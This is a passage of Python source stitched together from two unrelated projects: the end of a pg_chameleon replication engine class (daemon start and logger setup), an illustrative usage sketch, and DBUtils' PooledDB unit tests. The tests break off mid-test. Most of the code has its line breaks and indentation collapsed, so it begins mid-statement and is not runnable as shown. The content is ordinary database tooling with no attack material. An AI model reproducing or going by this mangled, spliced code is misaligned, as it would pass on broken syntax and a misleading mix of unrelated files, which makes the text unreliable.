= Daemonize(app=app_name, pid=maintenance_pid, action=self.pg_engine.run_maintenance, foreground=foreground , keep_fds=keep_fds) try: maintenance_daemon.start() except: print("The maintenance process is already started. Aborting the command.") def __init_logger(self, logger_name): """ The method initialise a new logger object using the configuration parameters. The formatter is different if the debug option is enabler or not. The method returns a new logger object and sets the logger's file descriptor in the class variable logger_fds, used when the process is demonised. :param logger_name: the name of the logger used to build the file name and get the correct logger :return: list with logger and file descriptor :rtype: list """ log_dir = self.config["log_dir"] log_level = self.config["log_level"] log_dest = self.config["log_dest"] log_days_keep = self.config["log_days_keep"] config_name = self.args.config source_name = self.args.source debug_mode = self.args.debug if source_name == '*': log_name = "%s_general" % (config_name) elif logger_name == "global": log_name = "%s_%s" % (config_name, source_name) else: log_name = "%s_%s_%s" % (config_name, source_name, logger_name) log_file = os.path.expanduser('%s/%s.log' % (log_dir,log_name)) logger = logging.getLogger(logger_name) logger.setLevel(logging.DEBUG) logger.propagate = False if debug_mode: str_format = "%(asctime)s %(processName)s %(levelname)s %(filename)s (%(lineno)s): %(message)s" else: str_format = "%(asctime)s %(processName)s %(levelname)s: %(message)s" formatter = logging.Formatter(str_format, "%Y-%m-%d %H:%M:%S") if log_dest=='stdout' or debug_mode: fh=logging.StreamHandler(sys.stdout) elif log_dest=='file': fh = TimedRotatingFileHandler(log_file, when="d",interval=1,backupCount=log_days_keep) if log_level=='debug' or debug_mode: fh.setLevel(logging.DEBUG) elif log_level=='info': fh.setLevel(logging.INFO) fh.setFormatter(formatter) logger.addHandler(fh) logger_fds = fh.stream.fileno() return [logger, logger_fds]
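
# --- Illustrative sketch, not part of pg_chameleon ---
# replica_engine is normally driven by the chameleon.py command line wrapper,
# which builds an argparse namespace and dispatches on the requested command.
# The attribute names below are the ones the constructor above reads
# (command, config, source, tables, schema, full, debug, rollbar_level, logid).
# The configuration name "default" is an assumption; it must match an existing
# ~/.pg_chameleon/configuration/default.yml file.
from argparse import Namespace


def example_show_status():
    args = Namespace(
        command="show_status",    # sub-command to run
        config="default",         # configuration file name, without the .yml suffix
        source="*",               # "*" addresses every configured source
        tables="*",
        schema="*",
        full=False,
        debug=True,               # stay in the foreground instead of daemonising
        rollbar_level="error",    # must be one of critical/error/warning/info
        logid="*",
    )
    replica = replica_engine(args)
    replica.show_status()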
test_pooled_db.py
"""Test the PooledDB module. Note: We don't test performance here, so the test does not predicate whether PooledDB actually will help in improving performance or not. We also assume that the underlying SteadyDB connections are tested. Copyright and credit info: * This test was contributed by Christoph Zwerschke """ import unittest from . import mock_db as dbapi from dbutils.pooled_db import ( PooledDB, SharedDBConnection, InvalidConnection, TooManyConnections) class TestPooledDB(unittest.TestCase): def test_version(self): from dbutils import __version__, pooled_db self.assertEqual(pooled_db.__version__, __version__) self.assertEqual(PooledDB.version, __version__) def test_no_threadsafety(self): from dbutils.pooled_db import NotSupportedError for threadsafety in (None, 0): dbapi.threadsafety = threadsafety self.assertRaises(NotSupportedError, PooledDB, dbapi) def test_threadsafety(self): for threadsafety in (1, 2, 3): dbapi.threadsafety = threadsafety pool = PooledDB(dbapi, 0, 0, 1) self.assertTrue(hasattr(pool, '_maxshared')) if threadsafety > 1: self.assertEqual(pool._maxshared, 1) self.assertTrue(hasattr(pool, '_shared_cache')) else: self.assertEqual(pool._maxshared, 0) self.assertFalse(hasattr(pool, '_shared_cache')) def test_create_connection(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB( dbapi, 1, 1, 1, 0, False, None, None, True, None, None, 'PooledDBTestDB', user='PooledDBTestUser') self.assertTrue(hasattr(pool, '_idle_cache')) self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertTrue(hasattr(pool, '_shared_cache')) self.assertEqual(len(pool._shared_cache), 0) else: self.assertFalse(hasattr(pool, '_shared_cache')) self.assertTrue(hasattr(pool, '_maxusage')) self.assertIsNone(pool._maxusage) self.assertTrue(hasattr(pool, '_setsession')) self.assertIsNone(pool._setsession) con = pool._idle_cache[0] from dbutils.steady_db import SteadyDBConnection self.assertTrue(isinstance(con, SteadyDBConnection)) self.assertTrue(hasattr(con, '_maxusage')) self.assertEqual(con._maxusage, 0) self.assertTrue(hasattr(con, '_setsession_sql')) self.assertIsNone(con._setsession_sql) db = pool.connection() self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) self.assertTrue(hasattr(db, '_con')) self.assertEqual(db._con, con) self.assertTrue(hasattr(db, 'cursor')) self.assertTrue(hasattr(db, '_usage')) self.assertEqual(db._usage, 0) self.assertTrue(hasattr(con, '_con')) db_con = con._con self.assertTrue(hasattr(db_con, 'database')) self.assertEqual(db_con.database, 'PooledDBTestDB') self.assertTrue(hasattr(db_con, 'user')) self.assertEqual(db_con.user, 'PooledDBTestUser') self.assertTrue(hasattr(db_con, 'open_cursors')) self.assertEqual(db_con.open_cursors, 0) self.assertTrue(hasattr(db_con, 'num_uses')) self.assertEqual(db_con.num_uses, 0) self.assertTrue(hasattr(db_con, 'num_queries')) self.assertEqual(db_con.num_queries, 0) cursor = db.cursor() self.assertEqual(db_con.open_cursors, 1) cursor.execute('select test') r = cursor.fetchone() cursor.close() self.assertEqual(db_con.open_cursors, 0) self.assertEqual(r, 'test') self.assertEqual(db_con.num_queries, 1) self.assertEqual(db._usage, 1) cursor = db.cursor() self.assertEqual(db_con.open_cursors, 1) cursor.execute('set sessiontest') cursor2 = db.cursor() self.assertEqual(db_con.open_cursors, 2) cursor2.close() self.assertEqual(db_con.open_cursors, 1) cursor.close() self.assertEqual(db_con.open_cursors, 0) 
self.assertEqual(db_con.num_queries, 1) self.assertEqual(db._usage, 2) self.assertEqual( db_con.session, ['rollback', 'sessiontest']) pool = PooledDB(dbapi, 1, 1, 1) self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) db = pool.connection() self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) db.close() self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) db = pool.connection(True) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) db.close() self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) db = pool.connection(False) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) self.assertEqual(db._usage, 0) db_con = db._con._con self.assertIsNone(db_con.database) self.assertIsNone(db_con.user) db.close() self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) db = pool.dedicated_connection() self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) self.assertEqual(db._usage, 0) db_con = db._con._con self.assertIsNone(db_con.database) self.assertIsNone(db_con.user) db.close() self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) pool = PooledDB(dbapi, 0, 0, 0, 0, False, 3, ('set datestyle',)) self.assertEqual(pool._maxusage, 3) self.assertEqual(pool._setsession, ('set datestyle',)) con = pool.connection()._con self.assertEqual(con._maxusage, 3) self.assertEqual(con._setsession_sql, ('set datestyle',)) def test_close_connection(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB( dbapi, 0, 1, 1, 0, False, None, None, True, None, None, 'PooledDBTestDB', user='PooledDBTestUser') self.assertTrue(hasattr(pool, '_idle_cache')) self.assertEqual(len(pool._idle_cache), 0) db = pool.connection() self.assertTrue(hasattr(db, '_con')) con = db._con self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) self.assertTrue(hasattr(db, '_shared_con')) shared_con = db._shared_con self.assertEqual(pool._shared_cache[0], shared_con) self.assertTrue(hasattr(shared_con, 'shared')) self.assertEqual(shared_con.shared, 1) self.assertTrue(hasattr(shared_con, 'con')) self.assertEqual(shared_con.con, con) from dbutils.steady_db import SteadyDBConnection self.assertTrue(isinstance(con, SteadyDBConnection)) self.assertTrue(hasattr(con, '_con')) db_con = con._con self.assertTrue(hasattr(db_con, 'num_queries')) self.assertEqual(db._usage, 0) self.assertEqual(db_con.num_queries, 0) db.cursor().execute('select test') self.assertEqual(db._usage, 1) self.assertEqual(db_con.num_queries, 1) db.close() self.assertIsNone(db._con) if shareable: self.assertIsNone(db._shared_con) self.assertEqual(shared_con.shared, 0) self.assertRaises(InvalidConnection, getattr, db, '_usage') self.assertFalse(hasattr(db_con, '_num_queries')) self.assertEqual(len(pool._idle_cache), 1) self.assertEqual(pool._idle_cache[0]._con, db_con) if shareable: self.assertEqual(len(pool._shared_cache), 0) db.close() if shareable: self.assertEqual(shared_con.shared, 0) db = pool.connection() self.assertEqual(db._con, con) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) shared_con 
= db._shared_con self.assertEqual(pool._shared_cache[0], shared_con) self.assertEqual(shared_con.con, con) self.assertEqual(shared_con.shared, 1) self.assertEqual(db._usage, 1) self.assertEqual(db_con.num_queries, 1) self.assertTrue(hasattr(db_con, 'database')) self.assertEqual(db_con.database, 'PooledDBTestDB') self.assertTrue(hasattr(db_con, 'user')) self.assertEqual(db_con.user, 'PooledDBTestUser') db.cursor().execute('select test') self.assertEqual(db_con.num_queries, 2) db.cursor().execute('select test') self.assertEqual(db_con.num_queries, 3) db.close() self.assertEqual(len(pool._idle_cache), 1) self.assertEqual(pool._idle_cache[0]._con, db_con) if shareable: self.assertEqual(len(pool._shared_cache), 0) db = pool.connection(False) self.assertEqual(db._con, con) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) db.close() self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) def test_close_all(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi, 10) self.assertEqual(len(pool._idle_cache), 10) pool.close() self.assertEqual(len(pool._idle_cache), 0) pool = PooledDB(dbapi, 10) closed = ['no'] def close(what=closed): what[0] = 'yes' pool._idle_cache[7]._con.close = close self.assertEqual(closed, ['no']) del pool self.assertEqual(closed, ['yes']) pool = PooledDB(dbapi, 10, 10, 5) self.assertEqual(len(pool._idle_cache), 10) if shareable: self.assertEqual(len(pool._shared_cache), 0) cache = [] for i in range(5): cache.append(pool.connection()) self.assertEqual(len(pool._idle_cache), 5) if shareable: self.assertEqual(len(pool._shared_cache), 5) else: self.assertEqual(len(pool._idle_cache), 5) pool.close() self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) pool = PooledDB(dbapi, 10, 10, 5) closed = [] def close_idle(what=closed): what.append('idle') def close_shared(what=closed): what.append('shared') if shareable: cache = [] for i in range(5): cache.append(pool.connection()) pool._shared_cache[3].con.close = close_shared else: pool._idle_cache[7]._con.close = close_shared pool._idle_cache[3]._con.close = close_idle self.assertEqual(closed, []) del pool if shareable: del cache self.assertEqual(closed, ['idle', 'shared']) def test_shareable_connection(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi, 0, 1, 2) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) db1 = pool.connection() self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) db2 = pool.connection() self.assertNotEqual(db1._con, db2._con) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 2) db3 = pool.connection() self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 2) self.assertEqual(db3._con, db1._con) self.assertEqual(db1._shared_con.shared, 2) self.assertEqual(db2._shared_con.shared, 1) else: self.assertNotEqual(db3._con, db1._con) self.assertNotEqual(db3._con, db2._con) db4 = pool.connection() self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 2) self.assertEqual(db4._con, db2._con) self.assertEqual(db1._shared_con.shared, 2) self.assertEqual(db2._shared_con.shared, 2) else: self.assertNotEqual(db4._con, 
db1._con) self.assertNotEqual(db4._con, db2._con) self.assertNotEqual(db4._con, db3._con) db5 = pool.connection(False) self.assertNotEqual(db5._con, db1._con) self.assertNotEqual(db5._con, db2._con) self.assertNotEqual(db5._con, db3._con) self.assertNotEqual(db5._con, db4._con) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 2) self.assertEqual(db1._shared_con.shared, 2) self.assertEqual(db2._shared_con.shared, 2) db5.close() self.assertEqual(len(pool._idle_cache), 1) db5 = pool.connection() if shareable: self.assertEqual(len(pool._idle_cache), 1) self.assertEqual(len(pool._shared_cache), 2) self.assertEqual(db5._shared_con.shared, 3) else: self.assertEqual(len(pool._idle_cache), 0) pool = PooledDB(dbapi, 0, 0, 1) self.assertEqual(len(pool._idle_cache), 0) db1 = pool.connection(False) if shareable: self.assertEqual(len(pool._shared_cache), 0) db2 = pool.connection() if shareable: self.assertEqual(len(pool._shared_cache), 1) db3 = pool.connection() if shareable: self.assertEqual(len(pool._shared_cache), 1) self.assertEqual(db2._con, db3._con) else: self.assertNotEqual(db2._con, db3._con) del db3 if shareable: self.assertEqual(len(pool._idle_cache), 0) self.assertEqual(len(pool._shared_cache), 1) else: self.assertEqual(len(pool._idle_cache), 1) del db2 if shareable: self.assertEqual(len(pool._idle_cache), 1) self.assertEqual(len(pool._shared_cache), 0) else: self.assertEqual(len(pool._idle_cache), 2) del db1 if shareable: self.assertEqual(len(pool._idle_cache), 2) self.assertEqual(len(pool._shared_cache), 0) else: self.assertEqual(len(pool._idle_cache), 3) def test_min_max_cached(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi, 3) self.assertEqual(len(pool._idle_cache), 3) cache = [pool.connection() for i in range(3)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) cache = [pool.connection() for i in range(6)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 6) pool = PooledDB(dbapi, 0, 3) self.assertEqual(len(pool._idle_cache), 0) cache = [pool.connection() for i in range(3)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) cache = [pool.connection() for i in range(6)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) pool = PooledDB(dbapi, 3, 3) self.assertEqual(len(pool._idle_cache), 3) cache = [pool.connection() for i in range(3)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) cache = [pool.connection() for i in range(6)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) pool = PooledDB(dbapi, 3, 2) self.assertEqual(len(pool._idle_cache), 3) cache = [pool.connection() for i in range(4)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) pool = PooledDB(dbapi, 2, 5) self.assertEqual(len(pool._idle_cache), 2) cache = [pool.connection() for i in range(10)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 5) pool = PooledDB(dbapi, 1, 2, 3) self.assertEqual(len(pool._idle_cache), 1) cache = [pool.connection(False) for i in range(4)] self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 2) cache = 
[pool.connection() for i in range(10)] self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 3) del cache self.assertEqual(len(pool._idle_cache), 2) if shareable: self.assertEqual(len(pool._shared_cache), 0) pool = PooledDB(dbapi, 1, 3, 2) self.assertEqual(len(pool._idle_cache), 1) cache = [pool.connection(False) for i in range(4)] self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) cache = [pool.connection() for i in range(10)] if shareable: self.assertEqual(len(pool._idle_cache), 1) self.assertEqual(len(pool._shared_cache), 2) else: self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) if shareable: self.assertEqual(len(pool._shared_cache), 0) def test_max_shared(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi) self.assertEqual(len(pool._idle_cache), 0) cache = [pool.connection() for i in range(10)] self.assertEqual(len(cache), 10) self.assertEqual(len(pool._idle_cache), 0) pool = PooledDB(dbapi, 1, 1, 0) self.assertEqual(len(pool._idle_cache), 1) cache = [pool.connection() for i in range(10)] self.assertEqual(len(cache), 10) self.assertEqual(len(pool._idle_cache), 0) pool = PooledDB(dbapi, 0, 0, 1) cache = [pool.connection() for i in range(10)] self.assertEqual(len(cache), 10) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) pool = PooledDB(dbapi, 1, 1, 1) self.assertEqual(len(pool._idle_cache), 1) cache = [pool.connection() for i in range(10)] self.assertEqual(len(cache), 10) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) pool = PooledDB(dbapi, 0, 0, 7) cache = [pool.connection(False) for i in range(3)] self.assertEqual(len(cache), 3) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) cache = [pool.connection() for i in range(10)] self.assertEqual(len(cache), 10) self.assertEqual(len(pool._idle_cache), 3) if shareable: self.assertEqual(len(pool._shared_cache), 7) def test_sort_shared(self): dbapi.threadsafety = 2 pool = PooledDB(dbapi, 0, 4, 4) cache = [] for i in range(6): db = pool.connection() db.cursor().execute('select test') cache.append(db) for i, db in enumerate(cache): self.assertEqual(db._shared_con.shared, 1 if 2 <= i < 4 else 2) cache[2].begin() cache[3].begin() db = pool.connection() self.assertIs(db._con, cache[0]._con) db.close() cache[3].rollback() db = pool.connection() self.assertIs(db._con, cache[3]._con) def test_equally_shared(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi, 5, 5, 5) self.assertEqual(len(pool._idle_cache), 5) for i in range(15): db = pool.connection(False) db.cursor().execute('select test') db.close() self.assertEqual(len(pool._idle_cache), 5) for i in range(5): con = pool._idle_cache[i] self.assertEqual(con._usage, 3) self.assertEqual(con._con.num_queries, 3) cache = [] for i in range(35): db = pool.connection() db.cursor().execute('select test') cache.append(db) del db self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 5) for i in range(5): con = pool._shared_cache[i] self.assertEqual(con.shared, 7) con = con.con self.assertEqual(con._usage, 10) self.assertEqual(con._con.num_queries, 10) del cache 
self.assertEqual(len(pool._idle_cache), 5) if shareable: self.assertEqual(len(pool._shared_cache), 0) def test_many_shared(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi, 0, 0, 5) cache = [] for i in range(35): db = pool.connection() db.cursor().execute('select test1') db.cursor().execute('select test2') db.cursor().callproc('test3') cache.append(db) del db self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 5) for i in range(5): con = pool._shared_cache[i] self.assertEqual(con.shared, 7) con = con.con self.assertEqual(con._usage, 21) self.assertEqual(con._con.num_queries, 14) cache[3] = cache[8] = cache[33] = None cache[12] = cache[17] = cache[34] = None self.assertEqual(len(pool._shared_cache), 5) self.assertEqual(pool._shared_cache[0].shared, 7) self.assertEqual(pool._shared_cache[1].shared, 7) self.assertEqual(pool._shared_cache[2].shared, 5) self.assertEqual(pool._shared_cache[3].shared, 4) self.assertEqual(pool._shared_cache[4].shared, 6) for db in cache: if db: db.cursor().callproc('test4') for i in range(6): db = pool.connection() db.cursor().callproc('test4') cache.append(db) del db for i in range(5): con = pool._shared_cache[i] self.assertEqual(con.shared, 7) con = con.con self.assertEqual(con._usage, 28) self.assertEqual(con._con.num_queries, 14) del cache if shareable: self.assertEqual(len(pool._idle_cache), 5) self.assertEqual(len(pool._shared_cache), 0) else: self.assertEqual(len(pool._idle_cache), 35) def test_rollback(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety pool = PooledDB(dbapi, 0, 1) self.assertEqual(len(pool._idle_cache), 0) db = pool.connection(False) self.assertEqual(len(pool._idle_cache), 0) self.assertEqual(db._con._con.open_cursors, 0) cursor = db.cursor() self.assertEqual(db._con._con.open_cursors, 1) cursor.execute('set doit1') db.commit() cursor.execute('set dont1') cursor.close() self.assertEqual(db._con._con.open_cursors, 0) del db self.assertEqual(len(pool._idle_cache), 1) db = pool.connection(False) self.assertEqual(len(pool._idle_cache), 0) self.assertEqual(db._con._con.open_cursors, 0) cursor = db.cursor() self.assertEqual(db._con._con.open_cursors, 1) cursor.execute('set doit2') cursor.close() self.assertEqual(db._con._con.open_cursors, 0) db.commit() session = db._con._con.session db.close() self.assertEqual(session, [ 'doit1', 'commit', 'dont1', 'rollback', 'doit2', 'commit', 'rollback']) def test_maxconnections(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi, 1, 2, 2, 3) self.assertTrue(hasattr(pool, '_maxconnections')) self.assertEqual(pool._maxconnections, 3) self.assertTrue(hasattr(pool, '_connections')) self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) cache = [] for i in range(3): cache.append(pool.connection(False)) self.assertEqual(pool._connections, 3) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) self.assertRaises(TooManyConnections, pool.connection, 0) self.assertRaises(TooManyConnections, pool.connection) cache = [] self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 2) if shareable: self.assertEqual(len(pool._shared_cache), 0) for i in range(3): cache.append(pool.connection()) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(pool._connections, 2) self.assertEqual(len(pool._shared_cache), 
2) cache.append(pool.connection(False)) self.assertEqual(pool._connections, 3) self.assertEqual(len(pool._shared_cache), 2) else: self.assertEqual(pool._connections, 3) self.assertRaises(TooManyConnections, pool.connection, 0) if shareable: cache.append(pool.connection(True)) self.assertEqual(pool._connections, 3) else: self.assertRaises(TooManyConnections, pool.connection) del cache self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 2) pool = PooledDB(dbapi, 0, 1, 1, 1) self.assertEqual(pool._maxconnections, 1) self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 0) db = pool.connection(False) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) self.assertRaises(TooManyConnections, pool.connection, 0) self.assertRaises(TooManyConnections, pool.connection) del db self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) cache = [pool.connection()] self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) cache.append(pool.connection()) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._shared_cache), 1) self.assertEqual(pool._shared_cache[0].shared, 2) else: self.assertRaises(TooManyConnections, pool.connection) self.assertRaises(TooManyConnections, pool.connection, 0) if shareable: cache.append(pool.connection(True)) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._shared_cache), 1) self.assertEqual(pool._shared_cache[0].shared, 3) else: self.assertRaises(TooManyConnections, pool.connection, 1) del cache self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) db = pool.connection(False) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._idle_cache), 0) del db self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) pool = PooledDB(dbapi, 1, 2, 2, 1) self.assertEqual(pool._maxconnections, 2) self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) cache = [] cache.append(pool.connection(False)) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._idle_cache), 0) cache.append(pool.connection(False)) self.assertEqual(pool._connections, 2) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) self.assertRaises(TooManyConnections, pool.connection, 0) self.assertRaises(TooManyConnections, pool.connection) pool = PooledDB(dbapi, 4, 3, 2, 1, False) self.assertEqual(pool._maxconnections, 4) self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 4) cache = [] for i in range(4): cache.append(pool.connection(False)) self.assertEqual(pool._connections, 4) self.assertEqual(len(pool._idle_cache), 0) self.assertRaises(TooManyConnections, pool.connection, 0) self.assertRaises(TooManyConnections, pool.connection) pool = PooledDB(dbapi, 1, 2, 3, 4, False) self.assertEqual(pool._maxconnections, 4) self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) for i in range(4): cache.append(pool.connection()) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(pool._connections, 3) self.assertEqual(len(pool._shared_cache), 3) cache.append(pool.connection()) self.assertEqual(pool._connections, 3) cache.append(pool.connection(False)) 
self.assertEqual(pool._connections, 4) else: self.assertEqual(pool._connections, 4) self.assertRaises(TooManyConnections, pool.connection) self.assertRaises(TooManyConnections, pool.connection, 0) pool = PooledDB(dbapi, 0, 0, 3, 3, False) self.assertEqual(pool._maxconnections, 3) self.assertEqual(pool._connections, 0) cache = [] for i in range(3): cache.append(pool.connection(False)) self.assertEqual(pool._connections, 3) self.assertRaises(TooManyConnections, pool.connection, 0) self.assertRaises(TooManyConnections, pool.connection, 1) cache = [] self.assertEqual(pool._connections, 0) for i in range(3): cache.append(pool.connection()) self.assertEqual(pool._connections, 3) if shareable: for i in range(3): cache.append(pool.connection()) self.assertEqual(pool._connections, 3) else: self.assertRaises(TooManyConnections, pool.connection) self.assertRaises(TooManyConnections, pool.connection, 0) pool = PooledDB(dbapi, 0, 0, 3) self.assertEqual(pool._maxconnections, 0) self.assertEqual(pool._connections, 0) cache = [] for i in range(10): cache.append(pool.connection(False)) cache.append(pool.connection()) if shareable: self.assertEqual(pool._connections, 13) self.assertEqual(len(pool._shared_cache), 3) else: self.assertEqual(pool._connections, 20) pool = PooledDB(dbapi, 1, 1, 1, 1, True) self.assertEqual(pool._maxconnections, 1) self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) db = pool.connection(False) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._idle_cache), 0) def connection(): db = pool.connection() cursor = db.cursor() cursor.execute('set thread') cursor.close() db.close() from threading import Thread thread = Thread(target=connection) thread.start() thread.join(0.1) self.assertTrue(thread.is_alive()) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) session = db._con._con.session self.assertEqual(session, ['rollback']) del db thread.join(0.1) self.assertFalse(thread.is_alive()) self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) db = pool.connection(False) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._idle_cache), 0) self.assertEqual( session, ['rollback', 'rollback', 'thread', 'rollback']) del db def test_maxusage(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety for maxusage in (0, 3, 7): pool = PooledDB(dbapi, 0, 0, 0, 1, False, maxusage) self.assertEqual(pool._maxusage, maxusage) self.assertEqual(len(pool._idle_cache), 0) db = pool.connection(False) self.assertEqual(db._con._maxusage, maxusage) self.assertEqual(len(pool._idle_cache), 0) self.assertEqual(db._con._con.open_cursors, 0) self.assertEqual(db._usage, 0) self.assertEqual(db._con._con.num_uses, 0) self.assertEqual(db._con._con.num_queries, 0) for i in range(20): cursor = db.cursor() self.assertEqual(db._con._con.open_cursors, 1) cursor.execute('select test%i' % i) r = cursor.fetchone() self.assertEqual(r, 'test%i' % i) cursor.close() self.assertEqual(db._con._con.open_cursors, 0) if maxusage: j = i % maxusage + 1 else: j = i + 1 self.assertEqual(db._usage, j) self.assertEqual(db._con._con.num_uses, j) self.assertEqual(db._con._con.num_queries, j) db.cursor().callproc('test') self.assertEqual(db._con._con.open_cursors, 0) self.assertEqual(db._usage, j + 1) self.assertEqual(db._con._con.num_uses, j + 1) self.assertEqual(db._con._con.num_queries, j) def 
test_setsession(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety setsession = ('set time zone', 'set datestyle') pool = PooledDB(dbapi, 0, 0, 0, 1, False, None, setsession) self.assertEqual(pool._setsession, setsession) db = pool.connection(False) self.assertEqual(db._setsession_sql, setsession) self.assertEqual( db._con._con.session, ['time zone', 'datestyle']) db.cursor().execute('select test') db.cursor().execute('set test1') self.assertEqual(db._usage, 2) self.assertEqual(db._con._con.num_uses, 4) self.assertEqual(db._con._con.num_queries, 1) self.assertEqual( db._con._con.session, ['time zone', 'datestyle', 'test1']) db.close() db = pool.connection(False) self.assertEqual(db._setsession_sql, setsession) self.assertEqual( db._con._con.session, ['time zone', 'datestyle', 'test1', 'rollback']) db._con._con.close() db.cursor().execute('select test') db.cursor().execute('set test2') self.assertEqual( db._con._con.session, ['time zone', 'datestyle', 'test2']) def test_one_thread_two_connections(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi, 2) db1 = pool.connection() for i in range(5): db1.cursor().execute('select test') db2 = pool.connection() 